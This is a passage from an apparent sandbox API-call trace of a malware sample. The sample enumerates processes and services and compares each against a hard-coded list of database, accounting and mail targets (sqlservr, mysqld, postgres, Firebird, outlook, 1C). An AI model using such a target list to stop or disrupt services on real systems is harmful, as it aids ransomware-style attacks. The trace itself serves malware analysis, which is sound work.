(lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0273.501] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0273.501] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0273.501] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0273.501] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.501] lstrlenW (lpString="csrss.exe") returned 9 [0273.501] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0273.501] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0273.501] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0273.501] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0273.501] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0273.501] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0273.501] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0273.501] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0273.501] lstrlenW (lpString="wininit.exe") returned 11 [0273.501] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0273.501] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0273.502] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0273.502] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0273.502] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0273.502] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0273.502] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0273.502] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0273.502] lstrlenW (lpString="csrss.exe") returned 9 [0273.502] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0273.502] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0273.502] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0273.502] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0273.502] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0273.502] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0273.502] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0273.502] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0273.502] lstrlenW (lpString="winlogon.exe") returned 12 [0273.502] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0273.502] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0273.503] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0273.503] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0273.503] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0273.503] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0273.503] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0273.503] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0273.503] lstrlenW (lpString="services.exe") returned 12 [0273.503] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0273.503] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0273.503] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0273.503] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0273.503] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0273.503] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0273.503] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0273.503] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0273.503] lstrlenW (lpString="lsass.exe") returned 9 [0273.503] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0273.503] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0273.503] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0273.504] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0273.504] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0273.504] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0273.504] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0273.504] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0273.504] lstrlenW (lpString="lsm.exe") returned 7 [0273.504] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0273.504] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0273.504] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0273.504] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0273.504] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0273.504] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0273.504] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0273.505] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.505] lstrlenW (lpString="svchost.exe") returned 11 [0273.505] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.505] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.505] lstrlenW (lpString="svchost.exe") returned 11 [0273.505] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.505] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.506] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.506] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.506] lstrlenW (lpString="svchost.exe") returned 11 [0273.506] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.506] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.506] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.506] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.506] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.506] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.506] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.506] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.506] lstrlenW (lpString="svchost.exe") returned 11 [0273.506] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.506] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.506] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.506] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.507] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.507] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.507] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.507] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x374, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.507] lstrlenW (lpString="svchost.exe") returned 11 [0273.507] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.507] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.507] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.507] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.507] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.507] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.507] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.507] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0273.507] lstrlenW (lpString="audiodg.exe") returned 11 [0273.507] lstrcmpiW (lpString1="1c8.exe", lpString2="audiodg.exe") returned -1 [0273.508] lstrcmpiW (lpString1="1cv77.exe", lpString2="audiodg.exe") returned -1 [0273.508] lstrcmpiW (lpString1="outlook.exe", lpString2="audiodg.exe") returned 1 [0273.508] lstrcmpiW (lpString1="postgres.exe", lpString2="audiodg.exe") returned 1 [0273.508] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="audiodg.exe") returned 1 [0273.508] lstrcmpiW (lpString1="mysqld.exe", lpString2="audiodg.exe") returned 1 [0273.508] lstrcmpiW (lpString1="sqlservr.exe", lpString2="audiodg.exe") returned 1 [0273.508] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.508] lstrlenW (lpString="svchost.exe") returned 11 [0273.508] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0273.508] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0273.508] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0273.508] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0273.508] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0273.508] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0273.508] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0273.508] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0273.509] lstrlenW (lpString="userinit.exe") returned 12 [0273.509] lstrcmpiW (lpString1="1c8.exe", lpString2="userinit.exe") returned -1 [0273.509] lstrcmpiW (lpString1="1cv77.exe", lpString2="userinit.exe") returned -1 [0273.509] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0273.509] lstrlenW (lpString="explorer.exe") returned 12 [0273.509] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0273.509] lstrlenW (lpString="dwm.exe") returned 7 [0273.509] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x450, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.509] lstrlenW (lpString="svchost.exe") returned 11 [0273.510] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x3a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ivttvf.exe")) returned 1 [0273.510] lstrlenW (lpString="ivttvf.exe") returned 10 [0273.510] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x510, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0273.510] lstrlenW (lpString="spoolsv.exe") returned 11 [0273.510] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0273.510] lstrlenW (lpString="svchost.exe") returned 11 [0273.510] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x59c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0273.511] lstrlenW (lpString="taskhost.exe") returned 12 [0273.511] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0273.511] lstrlenW (lpString="reader_sl.exe") returned 13 [0273.511] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0273.511] lstrlenW (lpString="dllhost.exe") returned 11 [0273.511] Process32NextW (in: hSnapshot=0x1d4, lppe=0x55fd34 | out: lppe=0x55fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0273.512] CloseHandle (hObject=0x1d4) returned 1 [0273.512] Sleep (dwMilliseconds=0x1f4) [0274.106] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x41ad350 [0274.193] EnumServicesStatusExW (in: hSCManager=0x41ad350, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 0 [0274.194] GetLastError () returned 0xea [0274.194] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc9a) returned 0x3afc178 [0274.194] EnumServicesStatusExW (in: hSCManager=0x41ad350, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3afc178, cbBufSize=0xc9a, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3afc178, pcbBytesNeeded=0x55ff44, lpServicesReturned=0x55ff5c, lpResumeHandle=0x0) returned 1 [0274.194] CloseServiceHandle (hSCObject=0x41ad350) returned 1 [0274.194] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0274.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0274.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0274.194] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0274.194] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0274.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0274.194] lstrlenW (lpString="AudioSrv") returned 8 [0274.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0274.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0274.194] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0274.194] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0274.194] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0274.194] lstrlenW (lpString="BFE") returned 3 [0274.194] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0274.194] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0274.194] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0274.195] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0274.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0274.195] lstrlenW (lpString="CryptSvc") returned 8 [0274.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0274.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0274.195] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0274.195] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0274.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0274.195] lstrlenW (lpString="CscService") returned 10 [0274.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0274.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0274.195] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0274.195] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0274.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0274.195] lstrlenW (lpString="DcomLaunch") returned 10 [0274.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0274.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0274.195] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0274.195] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0274.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0274.195] lstrlenW (lpString="Dhcp") returned 4 [0274.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0274.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0274.195] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0274.195] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0274.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0274.195] lstrlenW (lpString="Dnscache") returned 8 [0274.195] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0274.195] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0274.195] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0274.195] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0274.195] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0274.196] lstrlenW (lpString="DPS") returned 3 [0274.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0274.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0274.196] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0274.196] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0274.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0274.196] lstrlenW (lpString="eventlog") returned 8 [0274.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0274.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0274.196] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0274.196] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0274.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0274.196] lstrlenW (lpString="EventSystem") returned 11 [0274.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0274.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0274.196] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0274.196] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0274.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0274.196] lstrlenW (lpString="gpsvc") returned 5 [0274.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0274.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0274.196] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0274.196] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0274.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0274.196] lstrlenW (lpString="LanmanWorkstation") returned 17 [0274.196] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0274.196] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0274.196] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0274.196] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0274.196] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0274.196] lstrlenW (lpString="lmhosts") returned 7 [0274.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0274.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0274.197] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0274.197] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0274.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0274.197] lstrlenW (lpString="MMCSS") returned 5 [0274.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0274.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0274.197] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0274.197] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0274.197] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0274.197] lstrlenW (lpString="MpsSvc") returned 6 [0274.197] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0274.197] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0274.198] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0274.198] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0274.198] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0274.198] lstrlenW (lpString="NlaSvc") returned 6 [0274.198] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0274.198] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0274.198] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0274.198] lstrcmpiW 